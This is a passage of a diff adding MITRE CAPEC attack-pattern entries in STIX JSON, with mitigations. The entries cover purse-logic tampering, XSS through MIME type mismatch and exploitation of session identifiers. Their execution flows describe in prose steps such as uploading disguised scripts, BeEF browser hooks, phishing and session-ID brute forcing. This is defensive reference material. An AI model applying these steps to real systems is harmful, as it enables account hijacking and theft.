"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--bc683ec3-bdbd-4f4b-9388-34935ef7440e", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a354ac27-1c18-44cc-bff5-3b97838a8a13", + "target_ref": "attack-pattern--3c404955-b160-423f-b148-d4fa4727e3a9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use obfuscation and other techniques to prevent reverse engineering the client code.", + "id": "course-of-action--3ccd2b17-b570-40d7-967b-b16308019cdb", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-207-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--471fb693-94a4-42fa-a5d0-f5f7f15c36a9", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3ccd2b17-b570-40d7-967b-b16308019cdb", + "target_ref": "attack-pattern--3c404955-b160-423f-b148-d4fa4727e3a9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker removes or modifies the logic on a client associated with monetary calculations resulting in incorrect 
information being sent to the server. A server may rely on a client to correctly compute monetary information. For example, a server might supply a price for an item and then rely on the client to correctly compute the total cost of a purchase given the number of items the user is buying. If the attacker can remove or modify the logic that controls these calculations, they can return incorrect values to the server. The attacker can use this to make purchases for a fraction of the legitimate cost or otherwise avoid correct billing for activities.", + "external_references": [ + { + "external_id": "CAPEC-208", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/208.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html" + } + ], + "id": "attack-pattern--014e5fc2-7564-4775-94aa-220601522b05", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Removing/short-circuiting 'Purse' logic: removing/mutating 'cash' decrements", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--3c404955-b160-423f-b148-d4fa4727e3a9" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "The targeted server must rely on the client to correctly perform monetary calculations and must fail to detect errors in these calculations." + ], + "x_capec_resources_required": [ + "The attacker must have access to the client for the targeted service (this step is trivial for most web-based services). The attacker must also be able to reverse engineer the client in order to locate and modify the client's purse logic. Reverse engineering tools would be necessary for this." 
+ ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary creates a file with scripting content but where the specified MIME type of the file is such that scripting is not expected. The adversary tricks the victim into accessing a URL that responds with the script file. Some browsers will detect that the specified MIME type of the file does not match the actual type of its content and will automatically switch to using an interpreter for the real content type. If the browser does not invoke script filters before doing this, the adversary's script may run on the target unsanitized, possibly revealing the victim's cookies or executing arbitrary script in their browser.", + "external_references": [ + { + "external_id": "CAPEC-209", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/209.html" + }, + { + "external_id": "CWE-79", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/79.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-646", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/646.html" + }, + { + "description": "OWASP Testing Guide (v4), The Open Web Application Security Project (OWASP)", + "external_id": "REF-78", + "source_name": "reference_from_CAPEC", + "url": "http://www.owasp.org/index.php/Testing_for_Stored_Cross_site_scripting_(OWASP-DV-002)" + } + ], + "id": "attack-pattern--b27e3b46-2838-4339-a570-006474c8c402", + "modified": "2022-02-22T00:00:00.000Z", + "name": "XSS Using MIME Type Mismatch", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + 
"attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "For example, the MIME type text/plain may be used where the actual content is text/javascript or text/html. Since text does not contain scripting instructions, the stated MIME type would indicate that filtering is unnecessary. However, if the target application subsequently determines the file's real type and invokes the appropriate interpreter, scripted content could be invoked.", + "In another example, img tags in HTML content could reference a renderable type file instead of an expected image file. The file extension and MIME type can describe an image file, but the file content can be text/javascript or text/html resulting in script execution. If the browser assumes all references in img tags are images, and therefore do not need to be filtered for scripts, this would bypass content filters." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for stored user-controllable inputs: Using a browser or an automated tool, an adversary follows all public links and actions on a web site. They record all areas that allow a user to upload content through an HTTP POST request. This is typically found in blogs or forums.

  2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to file upload features
    Use a proxy tool to record all links visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.

Experiment

  1. Probe identified potential entry points for MIME type mismatch: The adversary uses the entry points gathered in the \"Explore\" phase as a target list and uploads files with scripting content, but whose MIME type is specified as a file type that cannot execute scripting content. If the application only checks the MIME type of the file, it may let the file through, causing the script to be executed by any user who accesses the file.

  2. Techniques
    Upload a script file with a MIME type of text/plain to a forum and then access the uploaded file to see if the script is executed. If possible, the script displays a unique identifier so the adversary knows for certain it was executed when testing.
  3. Store malicious XSS content: Once the adversary has determined which file upload locations are vulnerable to MIME type mismatch, they will upload a malicious script disguised as a non scripting file. The adversary can have many goals, from stealing session IDs, cookies, credentials, and page content from a victim.

  4. Techniques
    Use a tool such as BeEF to store a hook into the web application. This will alert the adversary when the victim has accessed the content and will give the adversary control over the victim's browser, allowing them access to cookies, user screenshot, user clipboard, and more complex XSS attacks.

Exploit

  1. Get victim to view stored content: In order for the attack to be successful, the victim needs to view the stored malicious content on the webpage.

  2. Techniques
    Send a phishing email to the victim containing a URL that will direct them to the malicious stored content.
    Simply wait for a victim to view the content. This is viable in situations where content is posted to a popular public forum.
", + "x_capec_prerequisites": [ + "The victim must follow a crafted link that references a scripting file that is mis-typed as a non-executable file.", + "The victim's browser must detect the true type of a mis-labeled scripting file and invoke the appropriate script interpreter without first performing filtering on the content." + ], + "x_capec_resources_required": [ + "The adversary must have the ability to source the file of the incorrect MIME type containing a script." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary guesses, obtains, or \"rides\" a trusted identifier (e.g. session ID, resource ID, cookie, etc.) to perform authorized actions under the guise of an authenticated user or service.\n ", + "external_references": [ + { + "external_id": "CAPEC-21", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/21.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + }, + { + "external_id": "CWE-302", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/302.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-539", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/539.html" + }, + { + "external_id": "CWE-6", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/6.html" + }, + { + "external_id": "CWE-384", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/384.html" + }, + { + "external_id": "CWE-664", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/664.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": 
"http://cwe.mitre.org/data/definitions/602.html" + }, + { + "external_id": "CWE-642", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/642.html" + }, + { + "description": "Access Token Manipulation", + "external_id": "T1134", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1134" + }, + { + "description": "Steal Application Access Token", + "external_id": "T1528", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1528" + }, + { + "description": "Steal Web Session Cookie", + "external_id": "T1539", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1539" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Exploitation of Trusted Identifiers", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Thin client applications like web applications are particularly vulnerable to session ID attacks. Since the server has very little control over the client, but still must track sessions, data, and objects on the server side, cookies and other mechanisms have been used to pass the key to the session data between the client and server. When these session keys are compromised it is trivial for an adversary to impersonate a user's session in effect, have the same capabilities as the authorized user. 
There are two main ways for an adversary to exploit session IDs.\n A brute force attack involves an adversary repeatedly attempting to query the system with a spoofed session header in the HTTP request. A web server that uses a short session ID can be easily spoofed by trying many possible combinations so the parameters session-ID= 1234 has few possible combinations, and an adversary can retry several hundred or thousand request with little to no issue on their side.\n The second method is interception, where a tool such as wireshark is used to sniff the wire and pull off any unprotected session identifiers. The adversary can then use these variables and access the application.\n ", + "For example, in a message queuing system that allows service requesters to post messages to its queue through an open channel (such as anonymous FTP), authorization is done through checking group or role membership contained in the posted message. However, there is no proof that the message itself, the information in the message (such group or role membership), or the process that wrote the message to the queue is authentic and authorized to do so." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for Indicators of Susceptibility: Using a variety of methods, until one is found that applies to the target, the adversary probes for cookies, session tokens, or entry points that bypass identifiers altogether.

  2. Techniques
    Spider all available pages
    Attack known bad interfaces
    Search outward-facing configuration and properties files for identifiers.

Experiment

  1. Fetch samples: The adversary fetches many samples of identifiers. This may be through legitimate access (logging in, legitimate connections, etc.) or via systematic probing.

  2. Techniques
    An adversary makes many anonymous connections and records the session IDs assigned.
    An adversary makes authorized connections and records the session tokens or credentials issued.
    An adversary gains access to (legitimately or illegitimately) a nearby system (e.g., in the same operations network, DMZ, or local network) and makes a connection from it, attempting to gain the same privileges as a trusted system.

Exploit

  1. Impersonate: An adversary can use successful experiments or authentications to impersonate an authorized user or system or to laterally move within a system or application

  2. Spoofing: Malicious data can be injected into the target system or into a victim user's system by an adversary. The adversary can also pose as a legitimate user to perform social engineering attacks.

  3. Data Exfiltration: The adversary can obtain sensitive data contained within the system or application.

", + "x_capec_extended_description": "\n Attacks leveraging trusted identifiers typically result in the adversary laterally moving within the local network, since users are often allowed to authenticate to systems/applications within the network using the same identifier. This allows the adversary to obtain sensitive data, download/install malware on the system, pose as a legitimate user for social engineering purposes, and more.\n Attacks on trusted identifiers take advantage of the fact that some software accepts user input without verifying its authenticity. Many server side processes are vulnerable to these attacks because the server to server communications have not been analyzed from a security perspective or the processes \"trust\" other systems because they are behind a firewall. Similarly, servers that use easy to guess or spoofable schemes for representing digital identity can also be vulnerable. Such systems frequently use schemes without cryptography and digital signatures (or with broken cryptography). Identifiers may be guessed or obtained due to insufficient randomness, poor protection (passed/stored in the clear), lack of integrity (unsigned), or improper correlation with access control policy enforcement points. Exposed configuration and properties files that contain sensitive data may additionally provide an adversary with the information needed to obtain these identifiers. 
An adversary may also \"ride\" an identifier via a malicious link, as is the case in Cross Site Request Forgery (CSRF) attacks.\n Regardless of the attack vector, successful spoofing and impersonation of trusted credentials can lead to an adversary breaking authentication, authorization, and audit controls with the target system or application.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--414d0884-4f46-4a51-b4ea-72125c7f5f9e", + "attack-pattern--56b4150a-10fd-42cd-85ff-1063625ec5f4", + "attack-pattern--63f43efb-7a34-4302-b3dc-8245100fdea9", + "attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d" + ], + "x_capec_prerequisites": [ + "Server software must rely on weak identifier proof and/or verification schemes.", + "Identifiers must have long lifetimes and potential for reusability.", + "Server software must allow concurrent sessions to exist." + ], + "x_capec_resources_required": [ + "Ability to deploy software on network.", + "Ability to communicate synchronously or asynchronously with server." 
+ ], + "x_capec_skills_required": { + "Low": "To achieve a direct connection with the weak or non-existent server session access control, and pose as an authorized user" + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: utilize strong federated identity such as SAML to encrypt and sign identity tokens in transit.", + "id": "course-of-action--de3ee34b-075a-4ee0-8aee-606adc412d09", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-21-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f9eaa515-4e04-4e48-a95a-a5cc76d3fae0", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--de3ee34b-075a-4ee0-8aee-606adc412d09", + "target_ref": "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Use industry standards session key generation mechanisms that utilize high amount of entropy to generate the session key. 
Many standard web and application servers will perform this task on your behalf.", + "id": "course-of-action--1b5eb714-1670-4a73-8ca3-0de95cf15371", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-21-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--65db9cb6-fc43-4034-b579-eb165dd5e4cb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1b5eb714-1670-4a73-8ca3-0de95cf15371", + "target_ref": "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: If the identifier is used for authentication, such as in the so-called single sign on use cases, then ensure that it is protected at the same level of assurance as authentication tokens.", + "id": "course-of-action--718ea228-55ed-4373-b43f-e69084b06529", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-21-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e264f74e-3bd0-46ab-bd67-3526a6e9d54f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--718ea228-55ed-4373-b43f-e69084b06529", + "target_ref": 
"attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: If the web or application server supports it, then encrypting and/or signing the identifier (such as cookie) can protect the ID if intercepted.", + "id": "course-of-action--c1ce77d8-271a-4727-aafa-d0dad619d017", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-21-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--12007caf-e1d7-492f-a685-f88c073bccb6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c1ce77d8-271a-4727-aafa-d0dad619d017", + "target_ref": "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use strong session identifiers that are protected in transit and at rest.", + "id": "course-of-action--a69d842f-709a-472e-a3e3-233815725789", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-21-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5a4a61eb-f51c-417d-88d8-2417fea9f0a4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a69d842f-709a-472e-a3e3-233815725789", + "target_ref": "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Utilize a session timeout for all sessions, for example 20 minutes. If the user does not explicitly logout, the server terminates their session after this period of inactivity. If the user logs back in then a new session key is generated.", + "id": "course-of-action--e5ebd596-622e-4395-b338-85a54ce00b34", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-21-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7c05cd2c-a62f-42aa-b4f2-db68b48a7d78", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e5ebd596-622e-4395-b338-85a54ce00b34", + "target_ref": "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Verify authenticity of all identifiers at runtime.", + "id": "course-of-action--3daed4ec-09d3-48c0-ac50-b37755e9928c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-21-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + 
"x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4a9103ab-a9ea-40f7-9a9c-2789bebcf094", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3daed4ec-09d3-48c0-ac50-b37755e9928c", + "target_ref": "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it was deemed not to be a legitimate attack pattern.", + "external_references": [ + { + "external_id": "CAPEC-211", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/211.html" + } + ], + "id": "attack-pattern--2f50c4ba-bba9-456b-8fc3-7a551ed4c65f", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Leveraging web tools (e.g. Mozilla's GreaseMonkey, Firebug) to change application behavior", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary leverages a legitimate capability of an application in such a way as to achieve a negative technical impact. The system functionality is not altered or modified but used in a way that was not intended. 
This is often accomplished through the overuse of a specific functionality or by leveraging functionality with design flaws that enables the adversary to gain access to unauthorized, sensitive data.", + "external_references": [ + { + "external_id": "CAPEC-212", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/212.html" + }, + { + "external_id": "CWE-1242", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1242.html" + }, + { + "external_id": "CWE-1246", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1246.html" + }, + { + "external_id": "CWE-1281", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1281.html" + } + ], + "id": "attack-pattern--c727c058-2c9d-4021-a1ec-81dd030dea59", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Functionality Misuse", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Availability": [ + "Other (Depending on the adversary's intended technical impact, a successful attack of this kind can compromise any or all elements of the security triad.)" + ], + "Confidentiality": [ + "Gain Privileges (A successful attack of this kind can compromise the confidentiality of an authorized user's credentials.)", + "Other (Depending on the adversary's intended technical impact, a successful attack of this kind can compromise any or all elements of the security triad.)" + ], + "Integrity": [ + "Other (Depending on the adversary's intended technical impact, a successful attack of this kind can compromise any or all elements of the security triad.)" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--5b2d7149-c0f3-4b42-9c10-febe7dfd3ea5", + "attack-pattern--4ee9fc30-e736-4f4f-b55b-8a3008214042", + 
"attack-pattern--83fc5df7-bb04-4ce7-b308-c9428e8f4456", + "attack-pattern--addd93c9-9278-4185-b402-e505d632c815", + "attack-pattern--e680008c-a642-4feb-a1c4-a29b54eb284a", + "attack-pattern--01a08342-5c58-4f61-b8e1-997e444b3a59" + ], + "x_capec_prerequisites": [ + "The adversary has the capability to interact with the application directly.The target system does not adequately implement safeguards to prevent misuse of authorized actions/processes." + ], + "x_capec_skills_required": { + "Low": "General computer knowledge about how applications are launched, how they interact with input/output, and how they are configured." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Perform comprehensive threat modeling, a process of identifying, evaluating, and mitigating potential threats to the application. This effort can help reveal potentially obscure application functionality that can be manipulated for malicious purposes.", + "id": "course-of-action--2c554d44-955a-43f5-bf93-2d6bfe5ebcf0", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-212-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--264be4df-68bd-477a-8b05-e975efd6ada7", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2c554d44-955a-43f5-bf93-2d6bfe5ebcf0", + "target_ref": "attack-pattern--c727c058-2c9d-4021-a1ec-81dd030dea59", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": 
"2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "When implementing security features, consider how they can be misused and compromised.", + "id": "course-of-action--b6e8099d-d2e6-4786-a628-0dac80173c67", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-212-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3688d3c6-8574-4547-aa9d-2d75e6da59b3", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b6e8099d-d2e6-4786-a628-0dac80173c67", + "target_ref": "attack-pattern--c727c058-2c9d-4021-a1ec-81dd030dea59", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of the existing attack pattern \"CAPEC-126 : Path Traversal\". 
Please refer to this other CAPEC going forward.", + "external_references": [ + { + "external_id": "CAPEC-213", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/213.html" + } + ], + "id": "attack-pattern--3ec96bbd-da0c-4640-a8ae-50e506206a2b", + "modified": "2017-08-04T00:00:00.000Z", + "name": "DEPRECATED: Directory Traversal", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it was merged into \"CAPEC-215 : Fuzzing for application mapping\". Please refer to this other CAPEC going forward.", + "external_references": [ + { + "external_id": "CAPEC-214", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/214.html" + } + ], + "id": "attack-pattern--27f34b27-52ae-42ae-a5c4-1155641eab90", + "modified": "2020-12-17T00:00:00.000Z", + "name": "DEPRECATED: Fuzzing for garnering J2EE/.NET-based stack traces, for application mapping", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker sends random, malformed, or otherwise unexpected messages to a target application and observes the application's log or error messages returned. The attacker does not initially know how a target will respond to individual messages but by attempting a large number of message variants they may find a variant that trigger's desired behavior. 
